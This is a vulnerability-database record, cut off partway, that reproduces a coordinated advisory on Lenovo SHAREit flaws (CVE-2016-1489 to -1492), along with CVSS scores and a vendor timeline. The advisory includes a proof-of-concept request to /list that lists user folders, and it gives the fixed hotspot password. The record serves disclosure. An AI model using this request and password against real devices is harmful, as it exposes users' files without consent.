Search criteria
21 vulnerabilities found for shareit by lenovo
VAR-201601-0461
Vulnerability from variot - Updated: 2025-04-13 23:21The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows allows remote attackers to obtain sensitive file names via a crafted file request to /list. Lenovo ShareIT is prone to multiple security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) for Windows is a set of file sharing software based on Windows system of China Lenovo (Lenovo). There is a security vulnerability in the Wifi hotspot component of Lenovo SHAREit for Windows versions earlier than 3.2.0. 1. Advisory Information
Title: Lenovo ShareIT Multiple Vulnerabilities Advisory ID: CORE-2016-0002 Advisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities Date published: 2016-01-25 Date of last update: 2016-01-22 Vendors contacted: Lenovo Release mode: Coordinated release
- Vulnerability Information
Class: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862] Impact: Security bypass, Information leak Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492
- Vulnerability Description
SHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers.
- Vulnerable Packages
Lenovo SHAREit for Android 3.0.18_ww Lenovo SHAREit for Windows 2.5.1.1 Other products and versions may also be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Lenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues.
The new version of the products can be found here [1].
- Credits
This vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team.
- Technical Description / Proof of Concept Code
7.1. Hard-coded password in Lenovo SHAREit for Windows
[CVE-2016-1491] When Lenovo SHAREit for Windows is configured to receive files, a Wifi HotSpot is set with an easy password (12345678). Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same.
7.2. The following request was used to perform this action:
POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40) Host: 192.168.173.1:2999 Connection: Keep-Alivek Accept-Encoding: gzip Content-Length: 0 HTTP/1.0 200 OK Content-Length: 2426
{"containers":[{"filepath":"C:\Users\admin\Contacts","has_thumbnail":false,"id":"C:\Users\admin\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\Users\admin\Desktop","has_thumbnail":false,"id":"C:\Users\admin\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\Users\admin\Documents","has_thumbnail":false,"id":"C:\Users\admin\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\Users\admin\Downloads","has_thumbnail":false,"id":"C:\Users\admin\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\Users\admin\Favorites","has_thumbnail":false,"id":"C:\Users\admin\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\Users\admin\Links", "has_thumbnail":false,"id":"C:\Users\admin\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\Users\admin\Music","has_thumbnail":false,"id":"C:\Users\admin\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},{"filepath":"C:\Users\admin\Pictures","has_thumbnail":false,"id":"C:\Users\admin\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},{"filepath":"C:\Users\admin\Saved Games","has_thumbnail":false,"id":"C:\Users\admin\Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},{"filepath":"C:\Users\admin\Searches","has_thumbnail":false,"id":"C:\Users\admin\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\Users\admin\Tracing","has_thumbnail":false,"id":"C:\Users\admin\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\Users\admin\Videos","has_thumbnail":false,"id":"C:\Users\admin\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}],"filepath":"C:\Users\admin","has_thumbnail":false,"id":"C:\Users\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}
7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit
[CVE-2016-1489] The files are transfered via HTTP without encryption. An attacker that is able to sniff the network traffic could to view the data transferred or perform man in the middle attacks, for example by modifying the content of the transferred files.
7.4. Open WiFi Network defined on Android devices
[CVE-2016-1492] When the application is configured to receive files, an open Wifi HotSpot is created without any password. An attacker could connect to that HotSpot and capture the information transferred between those devices.
- Report Timeline
2015-10-29: Core Security sent an initial notification to Lenovo. 2015-10-29: Lenovo replied attaching their public PGP key. 2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. 2015-10-29: Lenovo replied their development team would review Core Security findings. 2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. 2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. 2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. 2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. 2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. 2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. 2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. 2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. 2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. 2015-11-23: Lenovo informed Core Security that they had forwarded Core's analysis to their development team. 2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the "secure mode" and only used in the "easy mode". 2015-12-06: Lenovo informed Core Security that they were still working on the schedule. 2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. 2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. 2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. 2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. 2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn't planned a date for their advisory disclosure. 2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. 2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core's advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn't meet the Monday 11 deadline. 2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. 2016-01-06: Core Security sent Lenovo the draft version of the advisory. 2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. 2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. 2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February 2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. 2016-01-08: Lenovo informed Core Security that they agreed to our terms. 2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. 2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. 2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. 2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. 2016-01-19: Lenovo informed Core Security that they agreed to our request. 2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January. 2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. 2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. 2016-01-25: Advisory CORE-2016-0002 published. 9. References
[1] http://shareit.lenovo.com/#DOWNLOAD. [2] http://www.lenovo.com.
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201601-0461",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "shareit",
"scope": "lte",
"trust": 1.0,
"vendor": "lenovo",
"version": "2.5.1.1"
},
{
"model": "shareit",
"scope": "lt",
"trust": 0.8,
"vendor": "lenovo",
"version": "3.2.0 (windows)"
},
{
"model": "shareit",
"scope": "eq",
"trust": 0.6,
"vendor": "lenovo",
"version": "2.5.1.1"
},
{
"model": "shareit for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "lenovo",
"version": "2.5.1.1"
},
{
"model": "shareit for android 3.0.18 ww",
"scope": null,
"trust": 0.3,
"vendor": "lenovo",
"version": null
}
],
"sources": [
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001337"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-636"
},
{
"db": "NVD",
"id": "CVE-2016-1490"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:lenovo:shareit",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001337"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ivan Huertas from Core Security Consulting Team.",
"sources": [
{
"db": "BID",
"id": "81748"
}
],
"trust": 0.3
},
"cve": "CVE-2016-1490",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.7,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.1,
"id": "CVE-2016-1490",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.7,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.1,
"id": "VHN-90309",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"id": "CVE-2016-1490",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-1490",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2016-1490",
"trust": 0.8,
"value": "Low"
},
{
"author": "CNNVD",
"id": "CNNVD-201601-636",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-90309",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90309"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001337"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-636"
},
{
"db": "NVD",
"id": "CVE-2016-1490"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows allows remote attackers to obtain sensitive file names via a crafted file request to /list. Lenovo ShareIT is prone to multiple security vulnerabilities. \nAn attacker can exploit these issues to bypass certain security restrictions and gain access to sensitive information, to perform man-in-the-middle attacks and bypass authorization mechanism. Lenovo SHAREit (Eggplant Express) for Windows is a set of file sharing software based on Windows system of China Lenovo (Lenovo). There is a security vulnerability in the Wifi hotspot component of Lenovo SHAREit for Windows versions earlier than 3.2.0. 1. Advisory Information\n\nTitle: Lenovo ShareIT Multiple Vulnerabilities\nAdvisory ID: CORE-2016-0002\nAdvisory URL: http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities\nDate published: 2016-01-25\nDate of last update: 2016-01-22\nVendors contacted: Lenovo\nRelease mode: Coordinated release\n\n2. Vulnerability Information\n\nClass: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200], Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862]\nImpact: Security bypass, Information leak\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492\n\n \n\n3. Vulnerability Description\n\nSHAREit [1] is a free application from Lenovo [2] that lets you easily share files and folders among smartphones, tablets, and personal computers. \n\n4. Vulnerable Packages\n\nLenovo SHAREit for Android 3.0.18_ww\nLenovo SHAREit for Windows 2.5.1.1\nOther products and versions may also be affected, but they were not tested. \n\n5. Vendor Information, Solutions and Workarounds\n\nLenovo released an updated version of Lenovo SHAREit for Windows and Android that fix the reported issues. \n\nThe new version of the products can be found here [1]. \n\n6. Credits\n\nThis vulnerability was discovered and researched by Ivan Huertas from Core Security Consulting Team. The publication of this advisory was coordinated by Joaqu\u00edn Rodr\u00edguez Varela from Core Security Advisories Team. \n\n \n\n7. Technical Description / Proof of Concept Code\n\n7.1. Hard-coded password in Lenovo SHAREit for Windows\n\n[CVE-2016-1491] When Lenovo SHAREit for Windows is configured to receive files, a Wifi HotSpot is set with an easy password (12345678). Any system with a Wifi Network card could connect to that Hotspot by using that password. The password is always the same. \n\n7.2. The following request was used to perform this action:\n\n \nPOST /list?type=file\u0026path=C%3A%5CUsers\\admin HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40)\nHost: 192.168.173.1:2999\nConnection: Keep-Alivek\nAccept-Encoding: gzip\nContent-Length: 0\nHTTP/1.0 200 OK\nContent-Length: 2426\n\n\n{\"containers\":[{\"filepath\":\"C:\\\\Users\\\\admin\\\\Contacts\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Contacts\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Contacts\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Desktop\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Desktop\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Desktop\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Documents\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Documents\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Documents\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Downloads\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Downloads\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Downloads\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Favorites\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Favorites\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Favorites\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Links\",\n\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Links\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Links\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Music\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Music\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\nMusic\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Pictures\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Pictures\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\nPictures\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Saved\nGames\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Saved\nGames\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Saved\nGames\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Searches\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Searches\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Searches\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Tracing\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Tracing\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"Tracing\",\"type\":\"file\",\"ver\":\"\"},{\"filepath\":\"C:\\\\Users\\\\admin\\\\Videos\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\\\\Videos\",\"isloaded\":false,\"isroot\":false,\"isvolume\":false,\"name\":\"My\n\",\"type\":\"file\",\"ver\":\"\"}],\"filepath\":\"C:\\\\Users\\\\admin\",\"has_thumbnail\":false,\"id\":\"C:\\\\Users\\\\admin\",\"isloaded\":true,\"isroot\":false,\"isvolume\":false,\"name\":\"admin\",\"type\":\"file\",\"ver\":\"\"}\n \n7.3. Files transferred in plain text in Windows and Android version of Lenovo SHAREit\n\n[CVE-2016-1489] The files are transfered via HTTP without encryption. An attacker that is able to sniff the network traffic could to view the data transferred or perform man in the middle attacks, for example by modifying the content of the transferred files. \n\n7.4. Open WiFi Network defined on Android devices\n\n[CVE-2016-1492] When the application is configured to receive files, an open Wifi HotSpot is created without any password. An attacker could connect to that HotSpot and capture the information transferred between those devices. \n\n \n\n8. Report Timeline\n\n2015-10-29: Core Security sent an initial notification to Lenovo. \n2015-10-29: Lenovo replied attaching their public PGP key. \n2015-10-29: Core Security sent Lenovo a draft version of the advisory and requested a tentative day for the release of the patched version. \n2015-10-29: Lenovo replied their development team would review Core Security findings. \n2015-11-06: Lenovo informed that they would like to discuss their progress in a telephone meeting. \n2015-11-06: Core Security replied Lenovo that is our policy not to have such communications in order to always keep a log of all interactions with the vendor. \n2015-11-06: Lenovo replied they understood Core Security policy and asked if the first disclosure date was negotiable. \n2015-11-06: Core Security replied Lenovo that the date was negotiable, being the priority to make a coordinated release. \n2015-11-13: Lenovo informed Core Security they had addressed the Windows version issues and could share a beta fix for us to validate. They informed as well that the development team would continue to investigate the Android version issues. \n2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix. \n2015-11-20: Core Security replied saying there was a small delay in the review of the beta fix and informed Lenovo they would send a reply next week. \n2015-11-20: Lenovo asked Core Security to confirm that the publication date of the advisory was not going to be on November 30, and asked to seek an agreement regarding a specific date. \n2015-11-23: Core Security replied stating that they were not going to publish their findings on November 30, and the idea was to coordinate a schedule according to the release date of the corrected versions. Additionally, Core Security informed Lenovo regarding the beta fix, which was still using the hardcoded password. \n2015-11-23: Lenovo informed Core Security that they had forwarded Core\u0027s analysis to their development team. \n2015-11-25: Lenovo informed Core Security that they considered that issue as resolved considering that the hardcoded password was not present in the \"secure mode\" and only used in the \"easy mode\". \n2015-12-06: Lenovo informed Core Security that they were still working on the schedule. \n2015-12-07: Lenovo informed Core Security that they were targeting to release the updated Windows version on January 10 and that they would continue working with their third party partner for the Android version release. \n2016-01-04: Core Security asked Lenovo if the publication date could be moved from Sunday 10 to Monday 11 of January. \n2016-01-04: Lenovo asked Core Security for more specific justifications for not releasing on a Sunday. \n2016-01-05: Core Security informed Lenovo that is always recommend to publish on a working day in order to give enough time to the affected users to update their products (particularly corporate users) and avoid explotations of the published flaws by malicious users on the weekend. \n2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday 11 but that they hadn\u0027t planned a date for their advisory disclosure. \n2016-01-05: Core Security informed Lenovo that our advisory would be published the same day as the release of the new version. \n2015-01-05: Lenovo informed Core Security that they would publish their advisory concurrently with Core\u0027s advisory. Lenovo requested a draft version of the advisory in order to ensure consistency among publications. They asked how Core would like to be acknowledged in their advisory and offered additional publication dates in case they couldn\u0027t meet the Monday 11 deadline. \n2016-01-05: Core Security informed Lenovo that the additional publication dates ares acceptable if Core is informed with time of such changes. We informed that we would send them a draft of the advisory once it was completed and sent them the acknowledgment line as requested. \n2016-01-06: Core Security sent Lenovo the draft version of the advisory. \n2016-01-08: Lenovo informed Core Security that due they discovered additional vulnerabilities they requested to address both platform issues together. Additionaly thay requested an extension to the publication date to mid-February and a possibility to keep updating Lenovo SHAREit. \n2016-01-08: Core Security informed Lenovo that it was our first request to address all vulnerabilities in one advisory. Additinally we requested to know which vulnerabilities they were planning to address, and if those included any of the reported by us. We expressed our willingness to extend the deadline even though the maximum 3 months period we define was already over. \n2016-01-08: Lenovo informed Core Security that they intend to address al the reported vulnerabilities by us and requested confimration on extending the date of our joint disclosure to mid-February\n2016-01-08: Core Security informed Lenovo that we wanted to know exactly when each vulnerability was going to be addressed in advanced in order to agree to extend the date of our joint disclosure. \n2016-01-08: Lenovo informed Core Security that they agreed to our terms. \n2016-01-14: Lenovo informed Core Security that they were going to publish the new versions for both platforms addressing all the reported vulnerabilities on January 15 and expected to release the joint disclosure on mid-February. \n2016-01-14: Core Security informed Lenovo that is our policy to disclose our findings once the new version correcting the issues becomes available. We informed them that if that was going to happen the following day, we would be forced to publish our security advisory the following day as well. \n2016-01-15: Lenovo informed Core Security that they misunderstood our disclosure policy. They informed us that they would probably be publishing the following week and no later than January 22. \n2016-01-15: Core Security informed Lenovo that we commited to a joint security disclosure the day the software releases went live and requested an advanced notice as soon as they could. \n2016-01-19: Lenovo informed Core Security that they agreed to our request. \n2016-01-20: Core Security informed Lenovo that they would be publishing both versions on Friday 22 of January. \n2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. \n2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. \n2016-01-25: Advisory CORE-2016-0002 published. \n9. References\n\n[1] http://shareit.lenovo.com/#DOWNLOAD. \n[2] http://www.lenovo.com. \n\n10. About CoreLabs\n\nCoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. \n\n11. About Core Security Technologies\n\nCore Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted research and leading-edge threat expertise from the company\u0027s Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. \n\n12. Disclaimer\n\nThe contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. PGP/GPG Keys\n\nThis advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1490"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001337"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "VULHUB",
"id": "VHN-90309"
},
{
"db": "PACKETSTORM",
"id": "135378"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
